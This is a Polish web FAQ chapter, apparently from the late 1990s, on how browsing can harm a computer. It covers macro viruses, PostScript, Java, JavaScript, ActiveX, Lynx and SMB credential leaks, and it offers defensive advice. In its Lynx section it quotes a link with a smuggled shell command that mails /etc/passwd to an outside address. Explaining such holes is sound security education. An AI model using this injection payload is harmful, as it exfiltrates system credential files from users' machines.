| pl.comp.www FAQ | ||||
|---|---|---|---|---|
| Poprzedni | Poprzedni rozdział | Rozdział 5. Wędrowanie po pajęczynie | Następny rozdział | Następny |
Czy przeglądając WWW mogę narazić się na zniszczenie zawartości dysku, bądź inną formę destabilizacji pracy komputera?
Niestety tak ;-(. A poważnie: o ile masz wyłączoną Java`ę, ActiveX, VBScript, JavaScript, pracujesz za dobrze skonfigurowanym firewallem (najlepiej pośredniczącym --- proxy, albo za filtrem pakietów z odrzucaniem połączeń ICMP, NetBIOS over TCP, RCP) i nie ładujesz plików z danymi zawierającymi makroinstrukcje, PostScript oraz programów --- prawdopodobnie nic się nie stanie. Tylko, że mało kto tak robi ;-).
W pozostałych wypadkach:
pliki MS Worda, MS Excella (i innych programów mogących zawierać makroinstrukcje) i programy --- wiadomo powszechnie --- mogą być zakażone tzw. wirusami lub mogą być tzw. koniami trojańskimi i to nie zależy od medium przesyłowego. Zalecana jest wobec danych zewnętrznych (zwłaszcza w postaci binarnej) daleko posuniętą ostrożność: ściągany plik należy sprawdzić najświeższą posiadaną wersją programu antywirusowego, w wypadku programów warto zdobyć ,,oficjalne'' sumy kontrolne ściągniętego pliku i porównać je z posiadaną kopią.
PostScript , TeX są (czego nie wszyscy są świadomi) normalnymi programami i jak wszystkie programy mogą zawierać niebezpieczne operacje, które pewne przeglądarki/programy przeznaczone od ich przetwarzania mogą próbować wykonać: kasowanie plików albo zmiana hasła lub ustawień drukarek.
Java jest specyficznym środowiskiem, teoretycznie nie mogącym wydostać się poza izolowaną od systemu Java Virtual Machine funkcjonującą (przy przeglądaniu WWW) w przeglądarce. Jednak implementacja specyfikacji (nota bene wg ,,Java Security: From HotJava to Netscape and Beyond'' by Drew Dean, Edward Felten i Dan Wallach wymagającą pewnego przeprojektowania) nie jest zadaniem łatwym. Wkrótce po ,,przeglądarkowej'' premierze Java`y ujawniono kilka spektakularnych błędów:
| możliwość kasowania plików użytkowników z dysku (w wersjach 2.0 i 2.01 Netscape Navigatora) |
| możliwość nadmiernego zużycia czasu procesora (efektem czego może być uniemożliwienie działania systemu) |
| możliwość wykonania połączenia z dowolnym (nie zaś jedynie z tym z którego pobrano applet) hostem w sieci (co w połączeniu z relacjami zaufania z r-utills może być niebezpieczne dla całej organizacji |
| potencjalna możliwość (usunięta po jdk 1.1.) przełamania przez bytecode restrykcji Java Security Managera |
Patrz też:
RFC 2504 Users' Security Handbook. Guttman, L. Leong, G. Malkin. February 1999. (Format: TXT=74036 bytes) (Also FYI0034) (Status: INFORMATIONAL)
Java Security: Frequently Asked Questions. The Unofficial Answers from the Princeton Secure Internet Programming Team
Gary McGraw and Edward Felten Java Security: Hostile Applets, Holes and Antidotes
argumentem za wyłączeniem JavaScript jest nie ochrona integralności systemu jak w wypadku Java czy ActiveX a raczej prywatności . I tak np. Netscape Navigator 4.x (do 4.0.5) pozwalał na odczytanie zawartości preferences.js zdradzając informacje o preferencjach użytkownika, o jego serwerach i adresach, a także hasłach (z POP3 i IMAP) --- bardzo często tożsamych z używanymi w sieci lokalnej. Dalej, w IE 4.0. zaistniała możliwość podejrzenia części plików na komputerze użytkownika. Pojawiły się ostrzeżenia o możliwościach naruszenie prywatności przez ingerowanie w historię oglądanych w czasie bieżącej sesji stron, a także możliwość swoistego Denial of Service w formie rekurencyjnego mnożenia ramek (co w wypadku IE 4.0. jest możliwe i bez JavaScript).
Patrz też:
Lynx: istnieje coś takiego jak trusted hosts co pozwala wykonywać polecenia wydawane ze zdalnego komputera na lokalnym.
Poza tym możliwe jest (było do wersji 2.7.1 włącznie)
manipulowanie częścią z typowych tylko dla tej przeglądarki URLi:
< a
href="LYNXDOWNLOAD://Method=-1/File=`mail%20crakers@org.com.pl%3C/etc/passwd`/SugFile=test">
CLICK HERE < /a> próbuje (zwykle skutecznie) wysłać
plik z hasłami z lokalnej maszyny na konto crakers@org.com.pl
ActiveX. nie posiada poza systemem podpisów pod kontrolkami żadnych mechanizmów zabezpieczających przed dostępem do danych na dysku. Twórca wrogiej kontrolki (którą nieświadomy niczego użytkownik zaakceptuje jako przydatną) jest w stanie zrobić niemal wszystko z naszym systemem. W obiegu jest kilka przykładów tej technologii: Exploder (podpisana, i certfikowana kontrolka, wykonująca zamknięcie systemu), czy wrogie , pochodzące z Computer Chaos Club z Hamburga (jedna z nich ,,dobierała się'' do składowanych na dysku danych programu do finansów osobistych Quicken
poprzez przeglądarki działające na MS Windows" wszelkiej maści możliwe jest pozyskanie identyfikatora użytkownika, hasła, oraz innych parametrów przekazywanych w ramach autentyfikacji SMB aka NetBIOS over TCP/IP Jedyną sensowną receptą na tę formę obrony jest zastosowanie filtra pakietów na routerze brzegowym (obcinając na wyjściu porty 135, 137 i 139). (Wydaje się, że wersja 4.01. Internet Explorera ma opcje pozwalające na wyłączenie autentyfikacji przy pomocy SMB (domyślnie ustawione na disabled --- po wstępnych testach stwierdzam, że nie funkcjonującą, lub wyłączającą coś innego)).
Patrz też:
Lincoln D. Stein WWW Security FAQ. 9. Client Security
Kevin McCurley Security issues for the world wide web
Section 6: JavaScript Security [w:] DEVEDGE NEWSGROUP FAQ: JavaScript @ Netscape
Przetestuj swoją przeglądarkę @ Permision Denied Inc.
| Poprzedni | Spis treści | Następny |
| Praca off-line | Początek rozdziału | Prywatność w Pajęczynie |